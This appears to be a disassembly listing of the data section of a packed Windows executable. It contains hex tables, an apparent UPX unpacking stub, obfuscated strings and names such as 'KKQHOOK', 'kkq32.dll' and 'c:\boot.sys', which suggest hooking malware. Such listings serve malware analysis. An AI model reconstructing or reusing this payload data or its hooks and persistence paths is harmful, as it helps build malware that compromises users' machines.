dd 6F436695h, 656C706Dh, 0DB3E7164h, 0F3951B92h, 634200F7h
dd 68A0C6C0h, 17FA5A4Ah
dword_444804 dd 0F24DF6B5h dword_444808 dd 5D376E49h dword_44480C dd 257E3C45h dd 5E85FAA1h, 735002D7h
db 95h
dword_444819 dd 0B3B09F6Bh db 27h, 0BDh, 22h
dd 6E416F54h
db 1Bh, 8Dh
dword_444826 dd 0E65176Bh dw 0EA33h
dd 0BFF2644Dh, 4E7EB6C7h, 4D6D4D02h, 506B4CECh, 0BAD76761h
dd 7B9AA802h, 66624FE0h, 7E03661Eh, 4DB3585Eh, 52B517D4h
dd 0A1794214h, 41AACEDAh, 0EE780145h, 0D9F6C355h, 70795417h
dd 5369F913h, 186DFF95h, 736F1A05h, 6C6E726Bh, 2E78652Eh
dd 0B536D6E1h, 384B664Bh, 4F827361h, 0EFC97336h, 71634113h
dd 50726975h, 42ED7708h, 4973DEDBh, 48AD7172h, 69613E0Dh
dd 70B6BB33h, 44D40D7Bh, 5D65A370h, 0B14C4117h, 95517C08h
dd 0B5DBC174h, 0AD556764h, 22DC1176h, 0E2DAA95Bh, 158B5074h
dd 70DDCC27h, 42BDFEA8h, 19D46675h, 0E42581C8h, 6029332Ch
dd 5F4B0E49h, 8D0C4572h, 41006DEAh, 0C5BD6372h, 0D6DAF685h
dd 226EBAA3h, 0AB36EF33h, 69B7BC2Ah, 11F00AEh, 3DE4A033h
dd 0E55ACF6Ch, 42744136h, 0B726256Fh
dword_444914 dd 99802D92h dword_444918 dd 662B2B95h dd 65488DDDh, 3C797056h, 6422156Dh, 1D141587h, 491AF975h
dd 2E0D891Fh, 0A1535953h, 0D5F14AC8h, 0B6188901h, 90072D17h
dd 193001E6h, 0C95B4804h, 0C04F14B2h, 0D7431304h, 56B453C0h
dd 45055F9Dh, 0D034CDEDh, 4FAB5340h, 8B055FB3h, 46B9FE78h
dd 4BD4F0Bh, 6D03FEEFh, 452B26C3h, 473F075Dh, 7210B4EFh
dd 31631901h, 6C341D73h, 697B744Fh, 74D6735h, 61AE839Bh
dd 0D490D6Ch, 40232B66h, 3BAEB1BCh, 390334B9h, 64C76207h
dd 751D75D0h, 2343171Eh, 14B0736Dh, 2073C80Dh, 0C1886181h
dd 6B617418h, 339B20AFh, 0D13DF74Dh, 6F116307h, 3D927920h
dd 0CF76E0C4h, 0C1531407h, 3DF6DC0Ch, 0F34F7953h, 9DD6375Dh
dd 4B3354CFh, 6C056E2Dh, 0E066520Dh, 31C307BAh, 8DCF1375h
dd 119EE61Dh, 44CB4715h, 44946315h, 70698DD7h, 6E2D6979h
dd 0F7595B1Fh, 516849B6h, 53996521h, 0B9018905h, 560B0036h
dd 1C2B5881h, 0EF324B97h, 0F3070585h, 3135C8D8h, 7002E37h
dd 6665C44Fh, 61B774B0h, 0EBAF6ED5h, 71E790B6h, 1B4C2F29h
dd 1B842967h, 930D0EEBh, 0A3678D79h, 0ECAE1021h, 1B2013D9h
dd 0BA1AEB06h, 0BF3215A9h, 92D0530h, 0CEC26233h, 770C9B8Ah
dd 2F0D3054h, 51646DC6h, 742672C7h, 576FB38Fh, 0B6B7D29h
dd 0CC348D83h, 4F3E1FD5h, 6C096993h, 2FE76612h, 0A461EF6Eh
dd 72EBAC1h, 0D205779h, 0E7C77550h, 576106C6h, 643FB942h
dd 0BEE8C46Fh, 6F1F5C48h, 0EF43750Fh, 45258CA2h, 8BB3A77h
dd 5B642123h, 0E7DEDFE1h, 53B746CEh, 0F5695F75h, 0C26C61D2h
dd 561F44B7h, 87095D43h, 240056E8h, 0C27A6D84h, 7315B6E8h
dd 9A3611Fh, 337FB004h, 315CD90h, 0C43380A8h, 0DF34D034h
dd 0FFFFD55Bh, 0F34EE34h, 2A351B35h, 0A6353935h, 0D735D135h
dd 32A7E035h, 0FF556FFAh, 8A366B36h, 0A4369B36h, 8A371099h
dd 46381C37h, 0FFFFFF38h, 385F3A17h, 38E238C3h, 392838FEh
dd 39453938h, 3965394Bh, 39D339B6h, 39F939E6h, 0FFFFFFFFh
dd 3A403A39h, 3A4E3A47h, 3A5C3A55h, 3A6A3A63h, 3A783A71h
dd 3A9F3A90h, 3AB13AA8h, 3B083AF4h, 0FFFFFFFFh, 3B153B10h
dd 3B7E3B76h, 3C723C0Ch, 3C9F3C8Ch, 3D313D09h, 3DB93DB0h
dd 3E803E3Ah, 3E9E3E97h, 0FFFFAF8Bh, 3F043EBEh, 3F4C3F35h
dd 3F6E3F62h, 3FF03F7Dh, 7B1084F9h, 66FFFFF2h, 53020C0h
dd 2A311131h, 6C313931h, 89317831h, 0C319831h, 0FFC00232h
dd 2B3323FFh, 0C2334433h, 0B33E333h, 18341334h, 0FF8F2934h
dd 58FFFFDDh, 0F334C134h, 2134FB34h, 2E352935h, 89358135h
dd 0F335E5CBh, 1635FD35h, 7F462336h, 3036FFF7h, 41363936h
dd 7C365836h, 0BADB8236h, 4E36DD36h, 0FF0E5338h, 38FFFFFFh
dd 3890387Dh, 393E38B1h, 3A1739B1h, 3A5E3A22h, 3AC63A68h
dd 3B1D3AE8h, 3B7C3B28h, 0BFB73B85h, 3BFEFFFBh, 3C683C07h
dd 3C763C70h, 0B9883C80h, 3D503CE7h, 2E343D5Dh, 0FFFE453Eh
dd 4A3EFFFFh, 573E503Eh, 783E6E3Eh, 0DE3ECD3Eh, 6C3F613Eh
dd 933F853Fh, 0CA3FBF3Fh, 0E93FDB3Fh, 0EFFFFF3Fh, 0BFF4E81Eh
dd 3089304Ch, 30DE30D9h, 30FD30F6h, 3141313Ah, 3164315Bh
dd 0FFF42F10h, 319F3194h, 31AD31A8h, 31F831F2h, 1632353Fh
dd 1ADFFE1Bh, 34AAC39Eh, 34CB34BAh, 350834D7h, 356E8D20h
dd 0FE003780h, 35A03586h, 277835A5h, 763748h, 0F0DEDF0h
dd 0A72C380Eh, 68385038h, 0BFFFB7FFh, 1438CB51h, 20391939h
dd 2C392639h, 393439h, 39763961h, 398D3985h, 1B399Fh, 39A7EE0Bh
dd 0D099CBACh, 0FE00ED17h, 0F539FD5Bh, 0FF39FA39h, 3A103A4Bh
dd 3A1E3A18h, 0FFFFFF74h, 3AB31937h, 3B733B42h, 3BA83B81h
dd 3BB43BAEh, 3BC03BBAh, 3BCC3BC6h, 3BD83BD2h, 0FFFD2FFFh
dd 3BE43BDEh, 3BF03BEAh, 3DEE3DA2h, 0FA03DF3h, 213E143Eh
dd 353E303Eh, 0C006423Eh, 513EFFFFh, 603E563Eh, 813E723Eh
dd 903E893Eh, 473F3D3Eh, 1BFC02Bh, 913F83F0h, 0BC3FA629h
dd 0D53FC43Fh, 6DB19FFh, 30F3F32Dh, 1A3015DFh, 24301F30h
dd 0EDB7F824h, 302930h, 3F30F535h, 6A306530h, 0C7E61F30h
dd 424E009Eh, 19974931h, 0FA064060h, 458D01A2h, 73F84473h
dd 2EC49FEh, 0FB6B7068h, 302E3220h, 268B4B5Ch, 5C17809Eh
dd 0F4F05C77h, 55050120h, 0B1626470h, 0A70495C4h, 0FE77AA4Eh
dd 5A6AD43Bh, 536B4209h, 74726174h, 6F9C0530h, 756F7247h
dd 780AD670h, 1FAC0A41h, 740582C1h, 7618D734h, 76435016h
dd 6E73D55Ch, 0D01205Bh, 709FD700h, 7EDE01EDh, 0BA1D6F97h
dd 8F61D00h, 155C903Eh, 323C575Dh, 6604640h, 4523FB59h
dd 80082A1Fh, 0FF85F633h, 7F18177Eh, 5C661519h, 3B461E28h
dd 0A4237CF7h, 80E9F30Ah, 0FEE03B24h, 1CF24362h, 18004010h
dd 54680C13h, 0C9BE6176h, 111473C6h, 48100E6Ah, 0E054813Eh
dd 401028h, 0EE74C2A9h, 4C1B1448h, 0A306E7E0h, 54C65660h
dd 36A3090Fh, 49105AF7h, 40042005h, 64059C4Fh, 593167FBh
dd 64BD2034h, 0F6C94C9Ch, 9C9CBE57h, 0CF25C6A4h, 68C0A481h
dd 799FF7D0h, 681600D8h, 6ABB683Ah, 2394BE0Ah, 7FDDF348h
dd 0AC7D8D59h, 0BEA4A5F3h, 7D8D0B84h, 7CA5A5D8h, 0C11BB19Eh
dd 74BEF5F0h, 0B76CE80Ah, 0F84776EBh, 6468E4A5h, 0ACE6A40Bh
dd 205D99BEh, 2480553Eh, 6A7BC169h, 7457B001h, 6A0F14ECh
dd 350F3519h, 0F89B09E2h, 4CC4831Fh, 0CD9261C9h, 0DF08E19Ch
dd 37F56AF8h, 44A66CD4h, 0D4A94005h, 73850F80h, 0BE9DF761h
dd 6604EFBCh, 0FF0096F2h, 420EF7BAh, 358B0C64h, 0F4FE14ECh
dd 46306767h, 19031AD6h, 0BF784783h, 5204C2EEh, 842A3C30h
dd 10E1105h, 0D98B6159h, 68591E67h, 2A2039ECh, 0C8680134h
dd 10FF00F3h, 1A7CAD72h, 385A13DEh, 640AEA60h, 349F74C3h
dd 0D40476E0h, 112E30AFh, 7B2CEFEFh, 0D68D8D04h, 98D0FF68h
dd 0BF0A5628h, 204D1DEFh, 5FBB6C51h, 8B5900B5h, 3635C096h
dd 76A7962Ah, 50DD1448h, 4B65709h, 8DEA2D1Eh, 0FF33027Dh
dd 20F9080Eh, 0B023B454h, 1D24575Dh, 735957B0h, 0CC510205h
dd 60160000h, 1B70A028h, 19C4110h, 18013C61h, 5C21C406h
dd 31004401h, 0BA4280C0h, 9384BA0Ah, 0F9773Eh, 20303104h
dd 8824A692h, 1555790h, 20318804h, 0E292010Bh, 10E2090h
dd 65601D4h, 4C04B2C4h, 0E6062090h, 0F1256D3Eh, 88441212h
dd 0D8304116h, 7DE3D25Ch, 460AB27Bh, 0B6674456h, 85105580h
dd 43EC8A36h, 315C69C4h, 20067301h, 0C54165Fh, 20F20001h
dd 0F79E12Fh, 0D5656E01h, 22A0B078h, 0CE280C1h, 8DF50581h
dd 840C021Fh, 744EE054h, 57AC837Ah, 68170419h, 50599604h
dd 906CB05Fh, 510C02EBh, 0FD48206Ch, 7B2Ch, 71BFBC00h
dd 12000000h, 0FF0000h, 6000BE60h, 0BE8D0040h, 0FFFFB000h
dd 0FFCD8357h, 909010EBh, 90909090h, 8846068Ah, 0DB014707h
dd 1E8B0775h, 11FCEE83h, 0B8ED72DBh, 1, 775DB01h, 0EE831E8Bh
dd 11DB11FCh, 73DB01C0h, 8B0975EFh, 0FCEE831Eh, 0E473DB11h
dd 0E883C931h, 0C10D7203h, 68A08E0h, 0FFF08346h, 0C5897474h
dd 775DB01h, 0EE831E8Bh, 11DB11FCh, 75DB01C9h, 831E8B07h
dd 0DB11FCEEh, 2075C911h, 75DB0141h, 831E8B07h, 0DB11FCEEh
dd 0DB01C911h, 975EF73h, 0EE831E8Bh, 73DB11FCh, 2C183E4h
dd 0F300FD81h, 0D183FFFFh, 2F148D01h, 76FCFD83h, 42028A0Fh
dd 49470788h, 63E9F775h, 90FFFFFFh, 0C283028Bh, 83078904h
dd 0E98304C7h, 1F17704h, 0FF4CE9CFh, 895EFFFFh, 11AB9F7h
dd 78A0000h, 3CE82C47h, 80F77701h, 0F275043Fh, 5F8A078Bh
dd 0E8C16604h, 10C0C108h, 0F829C486h, 1E8EB80h, 830789F0h
dd 0D88905C7h, 0BE8DD9E2h, 7000h, 0C009078Bh, 5F8B3C74h
dd 30848D04h, 9000h, 8350F301h, 96FF08C7h, 9050h, 47078A95h
dd 0DC74C008h, 4857F989h, 0FF55AEF2h, 905496h, 74C00900h
dd 83038907h, 0E1EB04C3h, 905896FFh, 0E9610000h, 0FFFFDF61h
dd 26h dup(0)
dd 0A070h, 0A050h, 3 dup(0)
dd 0A07Dh, 0A060h, 3 dup(0)
dd 0A08Ah, 0A068h, 5 dup(0)
dd 0A094h, 0A0A2h, 0A0B2h, 0
dd 0A0C0h, 0
dd 0A0CEh, 0
aKernel32_dll_1 db 'KERNEL32.DLL',0
aAdvapi32_dll_0 db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
align 2
aLoadlibrarya db 'LoadLibraryA',0
align 10h
aGetprocaddress db 'GetProcAddress',0
align 10h
aExitprocess db 'ExitProcess',0
dd 65520000h, 6F6C4367h, 654B6573h, 79h, 646E6172h, 4Ch dup(0)
dd 6, 12h
dword_445458 dd 4Ch ; sub_408403:loc_408432�r ...
aFj_ db 'fj:.',0 ; DATA XREF: sub_40849F+12�o
aSHqZt db 's+HQ-ZT',0 ; DATA XREF: sub_40849F+25�o
byte_445469 db 0 ; DATA XREF: sub_40849F+55�o
word_44546A dw 59h ; DATA XREF: sub_40849F+E7�r
dword_44546C dd 4F5A53h aCBoot_sys db 'c:\boot.sys',0 ; DATA XREF: sub_4085C0+38�o
aCjA db '%CJ a/',0 ; DATA XREF: sub_4085C0+4B�o
aZ db ' < z',0 ; DATA XREF: sub_4085C0+AA�o
align 4
dword_44548C dd 11h, 0Fh dup(0)dword_4454CC dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_408886+13�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh, 7, 0Fh
dword_445514 dd 0 ; .text:loc_40873C�r ...
dword_445518 dd 0 dword_44551C dd 2 dd 0Ah
dword_445524 dd 0 ; .text:loc_40881C�r ...
aV2 db 'V& 2',0 ; DATA XREF: sub_408886+2B�o
aS91rndu db 's91RNDU',0 ; DATA XREF: sub_4088C3+19�o
aKsh4 db ' KSh/4',0 ; DATA XREF: sub_4088C3+41�o
dw 7
unicode 0, <>,0
dd 11h
dword_445544 dd 0 ; .text:loc_408A01�r ...
aVyfuC_0 db '+vyfu C',0 ; DATA XREF: sub_408A61+16�o
dword_445550 dd 0FFFFFFFFh dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
a7cx_0 db '#7CX|',0 ; DATA XREF: sub_408A61+EE�o
align 4
off_445958 dd offset loc_408B05 ; DATA XREF: sub_408A61+95�r
dd offset loc_408B0D
dd offset loc_408B33
dd offset loc_408B70
aNF8 db '=n`F8',0 ; DATA XREF: sub_408BEF+4A�o
a5papg db '*5pApG&',0 ; DATA XREF: sub_408C98+351�o
byte_445976 db 0 ; DATA XREF: sub_408C98+558�o
byte_445977 db 0 ; DATA XREF: sub_408C98+66C�o
a6K db '6#,K',0 ; DATA XREF: sub_408C98+88C�o
word_44597D dw 20h ; DATA XREF: sub_408C98+950�r
aRjhghl6 db 'RJHGHl6',0 ; DATA XREF: sub_408C98+975�o
dword_445987 dd 243531h byte_44598B db 36h ; DATA XREF: sub_408C98+A2A�o
db 2Fh, 0
dword_44598E dd 3F5F20h aXei? db ' xeI?<',0 ; DATA XREF: sub_4096E4+26�o
aZmbL db 'zMB%L ',0 ; DATA XREF: sub_4096E4+39�o
aCdeDa db '<Cde;Da',0 ; DATA XREF: sub_4096E4+4C�o
dword_4459A8 dd 417F2053h, 695A5Fhword_4459B0 dw 80h ; DATA XREF: sub_4096E4+E1�r
aJsz db ' jSZ',0 ; DATA XREF: sub_4096E4+1E5�o
aEq db '`<|',27h,'&eq',0 ; DATA XREF: sub_4096E4+356�o
dword_4459BF dd 6F816Ch dword_4459C3 dd 6E8254h aQutqT db '%Qutq t',0 ; DATA XREF: sub_4096E4+4B1�o
dword_4459CF dd 3C3370h dword_4459D3 dd 69207Fh dword_4459D7 dd 354547h aBPA db '&B /p%€',0 ; DATA XREF: sub_4096E4+6E7�o
aEijF db 'eiJ=+f',0 ; DATA XREF: sub_4096E4+8C2�o
a2qZg8 db '2q %ZG8',0 ; DATA XREF: sub_4096E4+A82�o
aMZ4 db '%,m z4',0 ; DATA XREF: sub_4096E4+B0E�o
word_4459F9 dw 52h ; DATA XREF: sub_4096E4+B1B�r
word_4459FB dw 34h ; DATA XREF: sub_4096E4+B40�r
aJzft db ' jzFt',0 ; DATA XREF: sub_4096E4+B7D�o
aEGry db 'E=GrY',0 ; DATA XREF: sub_4096E4+BEA�o
word_445A09 dw 20h ; DATA XREF: sub_4096E4+D60�r
dword_445A0B dd 765868h aCQtV db 'C-qT~V',0 ; DATA XREF: sub_40A4E2+21�o
aD9u5 db 'd 9u5',0 ; DATA XREF: sub_40A4E2+45�o
aSgl db '+SƒL',0 ; DATA XREF: sub_40A4E2+EE�o
dword_445A22 dd 487452h aVSl db '!‚*SL',0 ; DATA XREF: sub_40A4E2+1F4�o
word_445A2C dw 2Fh ; DATA XREF: sub_40A4E2+202�r
aRL db '&R:L',0 ; DATA XREF: sub_40A4E2+273�o
a82q0vu db '82Q0vu ',0 ; DATA XREF: sub_40A4E2+2F8�o
byte_445A3B db 0 ; DATA XREF: sub_40A4E2+3D4�o
aDsh_i db 'DSH.i',0 ; DATA XREF: sub_40A4E2+3F4�o
aX_ db 'X.',0 ; DATA XREF: sub_40A4E2+467�o
aGp db '%gp&',0 ; DATA XREF: sub_40A4E2+4F6�o
byte_445A4A db 0 ; DATA XREF: sub_40A4E2+539�o
aF db ' F',0 ; DATA XREF: sub_40A4E2+592�o
aO?gv db 'O?g‚',0 ; DATA XREF: sub_40A4E2+6A1�o
word_445A53 dw 78h ; DATA XREF: sub_40A4E2:loc_40AC92�r
aLwld db 'lwld%',0 ; DATA XREF: sub_40ACD5+3E�o
byte_445A5B db 0 ; DATA XREF: sub_40ACD5+A8�o
word_445A5C dw 20h ; DATA XREF: sub_40ADF7+C�r
aE_2 db '~ E- ',0 ; DATA XREF: sub_40ADF7+C0�o
aZmm db 'ZmM&',0 ; DATA XREF: sub_40ADF7+18D�o
word_445A69 dw 76h ; DATA XREF: sub_40ADF7:loc_40B0DC�r
dword_445A6B dd 202B67h dword_445A6F dd 704120h aFna@ db 'FnA@ :',0 ; DATA XREF: sub_40ADF7+6CB�o
a2z db '<2Z !',0 ; DATA XREF: sub_40ADF7+767�o
aCFw db 'C-FW',0 ; DATA XREF: sub_40ADF7+85A�o
align 4
byte_445A88 db 0F0h, 0 ; DATA XREF: sub_40ADF7+81B�o
word_445A8A dw 0FAFDh ; DATA XREF: sub_40ADF7+723�o
db 0
aEustXDqSedsq_1 db '¥ž‘’œ•Ð„ŸÐ‘…„˜Ÿ‚™Š•',0 ; DATA XREF: sub_40ADF7+616�o
aEustXDqSedsq_0 db '¥ž‘’œ•Ð„ŸÐ‘…„˜Ÿ‚™Š•ÐÝй¾³¿¢¢µ³¤Ð ¹¾ÞÐ œ•‘ƒ•ÜГŸ‚‚•“„Þ',0
; DATA XREF: sub_40ADF7+604�o
aGG_2 db 'ÕƒÝÕƒ',0 ; DATA XREF: sub_40ADF7+456�o
aAXsgxGxXudIa_0 db ' œ•‘ƒ•ÜЃ•œ•“„еˆ€™‚‘„™ŸžÐ©•‘‚',0 ; DATA XREF: sub_40ADF7+417�o
aGG_1 db 'ÕƒÐÕƒ',0 ; DATA XREF: sub_40ADF7+39B�o
; sub_40ADF7+65D�o
aAXsgxGxXudIasv db ' œ•‘ƒ•ÜЃ•œ•“„еˆ€™‚‘„™ŸžÐ½Ÿž„˜',0 ; DATA XREF: sub_40ADF7+353�o
aG db 'Õƒ',0 ; DATA XREF: sub_40ADF7+2F4�o
aGMGmUavqugxvjx db '³¼£¹´¬Õƒ¬¹ž ‚Ÿ“£•‚†•‚ÃÂ',0 ; DATA XREF: sub_40A4E2+6CE�o
aJ db '¦',0 ; DATA XREF: sub_40A4E2+6B0�o
asc_445B3F db '»',0 ; DATA XREF: sub_40A4E2+684�o
aGqcdzsvxmSuv_0 db '£Ÿ–„‡‘‚•¬½™“‚ŸƒŸ–„¬§™ž”Ÿ‡ƒ¬³…‚‚•ž„¦•‚ƒ™Ÿž¬£˜•œœ£•‚†™“•¿’š•“„´•œ‘‰'
; DATA XREF: sub_40A4E2+651�o
db '¼Ÿ‘”',0
aVxcsgdxvgxvjsu db '¢•—™ƒ„•‚£•‚†™“• ‚Ÿ“•ƒƒ',0 ; DATA XREF: sub_40A4E2+55A�o
aIxvuxF db '›•‚ž•œÃÂÞ”œœ',0 ; DATA XREF: sub_40A4E2+546�o
aMtqqdGig db '¬’ŸŸ„Þƒ‰ƒ',0 ; DATA XREF: sub_40A4E2+404�o
aDatkkq32_dll db 'datkkq32.dll',0 ; DATA XREF: sub_40A4E2+3B9�o
aDnkkq_dll db 'dnkkq.dll',0 ; DATA XREF: sub_40A4E2+398�o
aKkq32_dll db 'kkq32.dll',0 ; DATA XREF: sub_40A4E2+372�o
aGmG db 'Õƒ¬Õƒ',0 ; DATA XREF: sub_40A4E2+368�o
; sub_40A4E2+38E�o ...
aGmGXix db 'Õƒ¬ÕƒÞ•ˆ•',0 ; DATA XREF: sub_40A4E2+2AF�o
aXustXfgc db '•ž‘’œ•”ƒ–',0 ; DATA XREF: sub_40A4E2+C1�o
aMfvsjxvgmufsgv db '¬”‚™†•‚ƒ¬ž”™ƒ‚”Þƒ‰ƒ',0 ; DATA XREF: sub_40A4E2+54�o
dbl_445C04 dq 1.2 ; DATA XREF: sub_4096E4:loc_40A383�r
aUxzjxv db 'ž•‡†•‚',0 ; DATA XREF: sub_4096E4+C12�o
aIf db 'ˆ”Â',0 ; DATA XREF: sub_4096E4+BA0�o
aZeaf db '‡…€”Ð',0 ; DATA XREF: sub_4096E4+AD5�o
aGG_0 db 'ÕƒÐß³ÐÕƒ',0 ; DATA XREF: sub_4096E4+A8C�o
aMuqaasufUqa db '¬“Ÿ‘ž”Þ“Ÿ',0 ; DATA XREF: sub_4096E4+A35�o
aGmuqaasufAsc db 'Õƒ¬“Ÿ‘ž”Þ€™–',0 ; DATA XREF: sub_4096E4+A10�o
aMuafXix db '¬“”Þ•ˆ•',0 ; DATA XREF: sub_4096E4+9DC�o
aGmuafAsc db 'Õƒ¬“”Þ€™–',0 ; DATA XREF: sub_4096E4+9BC�o
aE_1 db 'ÊÕÀÂ…',0 ; DATA XREF: sub_4096E4+934�o
aFaa db 'Ï”€ÍÂ',0 ; DATA XREF: sub_4096E4+807�o
aGmGDaa db 'Õƒ¬ÕƒÞ„€',0 ; DATA XREF: sub_4096E4+6BE�o
aZagd db '‡€ƒ„Ð',0 ; DATA XREF: sub_4096E4+469�o
aB db '',0 ; DATA XREF: sub_4096E4+245�o
; sub_4096E4+518�o ...
aScuE db 'Ï™–“ÍÕ…',0 ; DATA XREF: sub_4096E4+1F4�o
aScu db '™–“',0 ; DATA XREF: sub_4096E4+1A9�o
; sub_4096E4+2D2�o
aGqcdzsvxmSuvqg db '£Ÿ–„‡‘‚•¬½™“‚ŸƒŸ–„¬§™ž”Ÿ‡ƒ',0 ; DATA XREF: sub_4096E4+197�o
; sub_4096E4+2C0�o
aZuxgAsa db '߇“•ƒÞ€˜€',0 ; DATA XREF: sub_4096E4+165�o
asc_445CA6 db 'ß',0 ; DATA XREF: sub_4096E4+130�o
aSddaG db '˜„„€ÊßßÕƒ',0 ; DATA XREF: sub_4096E4+F0�o
aGmGFsd db 'Õƒ¬ÕƒÞ”‘„',0 ; DATA XREF: sub_4096E4+A4�o
; sub_4096E4+B4F�o
aSuiUuxDqQudsue db '³œ™“›Ð¿ž“•Ð¤ŸÐ³Ÿž„™ž…•',0 ; DATA XREF: sub_408C98+7C6�o
aEdd db '²¥¤¤¿¾',0 ; DATA XREF: sub_408C98+7B4�o
aD db 'µ´¹¤',0 ; DATA XREF: sub_408C98+6BF�o
; sub_408C98+739�o
aAXsgxAsixUqvvx db ' œ•‘ƒ•Ð‘›•Ð“Ÿ‚‚•“„™ŸžƒÐ‘ž”Є‚‰Ð‘—‘™žÞ',0 ; DATA XREF: sub_408C98+5FC�o
aEustXDqSedsqvs db '¥ž‘’œ•Ð„ŸÐ‘…„˜Ÿ‚™Š•Þб¤½Ð ¹¾Ý³Ÿ”•Ð™ƒÐ‚•…™‚•”ЄŸÐ“Ÿ€œ•„•Ð„˜•Ð„‚‘'
; DATA XREF: sub_408C98+577�o
db 'žƒ‘“„™ŸžÞ',0
aDAQfx db '±¤½Ð ¹¾Ý³Ÿ”•',0 ; DATA XREF: sub_408C98+4ED�o
aIasvsdsquFsdx db 'µˆ€™‚‘„™ŸžÐ”‘„•',0 ; DATA XREF: sub_408C98+477�o
aIqevUsvfUeatxv db '©Ÿ…‚Г‘‚”О…’•‚',0 ; DATA XREF: sub_408C98+405�o
aE_0 db 'ÂÀÕÞÂ…',0 ; DATA XREF: sub_408C98+3A0�o
aE db 'ÕÞÂ…',0 ; DATA XREF: sub_408C98+35B�o
aI_1 db '³¿½²¿²¿¨',0 ; DATA XREF: sub_408C98+262�o
; sub_408C98+2CE�o
dword_445D94 dd 0D0D0D0FAh, 988485B1h, 8A99829Fh, 9F998491h, 91B6D09Eh
; DATA XREF: sub_408C98+120�o
dd 94959C99h
db 0DEh, 0
aGdD db '£¤±¤¹³',0 ; DATA XREF: sub_408C98+10E�o
; sub_408C98+17B�o ...
aKkqhook db 'KKQHOOK',0 ; DATA XREF: sub_408C98+F3�o
; sub_4096E4+25B�o ...
align 2
aIaQvxv db 'µˆ€œŸ‚•‚',0 ; DATA XREF: sub_408C98+3C�o
; sub_40ADF7+9B�o
aQuTXud db '´Ÿ“¿’š•“„',0 ; DATA XREF: sub_408C98+20�o
; sub_40ADF7+7D�o
byte_445DD1 db 1Bh, 24h, 2Ah ; DATA XREF: sub_4085C0+104�o
dd 3F226923h, 4686722h, 26333467h, 24673335h, 28251B7Dh
dd 34693328h
db 3Eh, 34h, 0
aB4I7_ db 'b4',1Bh,'$*#i7.!',0 ; DATA XREF: sub_4085C0+D0�o
a5Tui db 1Bh,',"5)"+tui#++',0 ; DATA XREF: sub_40849F+86�o
a?8 db '?8',0 ; DATA XREF: sub_4081B0+20E�o
byte_445E0B db 42h ; DATA XREF: sub_406E3F+F3B�o
dd 0B03030Bh, 0D420900h, 1E0D1B08h
db 9, 0
word_445E1A dw 0B42h ; DATA XREF: sub_406E3F+F0E�o
dd 0B0303h
db 9, 42h, 0
byte_445E23 db 4Ch ; DATA XREF: sub_406E3F+E81�o
db 0
byte_445E25 db 56h, 0 ; DATA XREF: sub_406E3F+DF6�o
aLi4v db 'LI4V',0 ; DATA XREF: sub_406E3F+D91�o
byte_445E2C db 10h, 0 ; DATA XREF: sub_406E3F+6EE�o
aP3i4a3i4rl db 'P*>-!)3I4A*#>!3I4RL',0 ; DATA XREF: sub_406E3F+641�o
aPA3i4rl db 'P!-%"<+A*#>!3I4RL',0 ; DATA XREF: sub_406E3F+5F0�o
aName: ; DATA XREF: sub_406E3F+2A�o
unicode 0, <name>,0
align 10h
aValue: ; DATA XREF: sub_406E3F+15�o
unicode 0, <value>,0
dword_445E6C dd 3B2A2004h, 2F263A26h, 2700693Dh, 273B2C3Dh, 0C693D2Ch
; DATA XREF: sub_406B40+97�o
dd 26253931h, 3B2C3Bh
a9ba05972F6a811: ; DATA XREF: sub_406A44+45�o
unicode 0, <{9BA05972-F6A8-11CF-A442-00A0C90A8F39}>,0
aHtml db '<HTML><!--',0 ; DATA XREF: sub_4063A9+428�o
; sub_4063A9+433�o ...
aXOkrecv11 db 'X-okRecv11',0 ; DATA XREF: sub_4063A9+370�o
aUts db 'îâáÕÆÊÂ',0 ; DATA XREF: sub_4063A9+2EB�o
aVVZkzZuZt db '‚Ô‚Ò‡Š‡êÎÄÕÈÔÈÁÓ‡îÉÓÂÕÉÂÓ‡âß×ËÈÕÂÕ',0 ; DATA XREF: sub_4063A9+299�o
byte_445F17 db 0FBh ; DATA XREF: sub_4063A9+19A�o
aUIZ db 'îÂß×ËÈÕ‰Â߇',0
word_445F26 dw 0C6F7h ; DATA XREF: sub_4063A9+89�o
db 0D3h, 0CFh, 0
byte_445F2B db 0F4h ; DATA XREF: sub_4063A9+77�o
dd 0D0D3C1C8h, 0FBC2D5C6h, 0D5C4CEEAh, 0C1C8D4C8h, 0E2EEFBD3h
dd 0D3C2F487h, 0F4FBD7D2h, 0D7D2D3C2h
db 0
byte_445F4D db 0E6h, 2 dup(0D7h) ; DATA XREF: sub_406081+2F8�o
dd 0C9C2D1E2h, 0F4FBD4D3h, 0CAC2CFC4h, 0E6FBD4C2h, 0FBD4D7D7h
dd 0CBD7DFE2h, 0D5C2D5C8h, 0D3C4E6FBh, 0D3C6D1CEh, 0E3C0C9CEh
dd 0CAD2C4C8h, 0FBD3C9C2h, 0D5D2E489h, 0D3C9C2D5h
db 0
byte_445F89 db 0E6h, 2 dup(0D7h) ; DATA XREF: sub_406081+2C8�o
dd 0C9C2D1E2h, 0F4FBD4D3h, 0CAC2CFC4h, 0E6FBD4C2h, 0FBD4D7D7h
dd 0CBD7DFE2h, 0D5C2D5C8h, 0D1C6E9FBh, 0D3C6C0CEh, 0FBC0C9CEh
dd 0D5D2E489h, 0D3C9C2D5h
db 0
byte_445FBD db 0E0h, 0CBh, 0C8h ; DATA XREF: sub_406081+294�o
dd 0F2CBC6C5h, 0E8D5C2D4h, 0CECBC1C1h
db 0C9h, 0C2h, 0
byte_445FCF db 0F4h ; DATA XREF: sub_406081+282�o
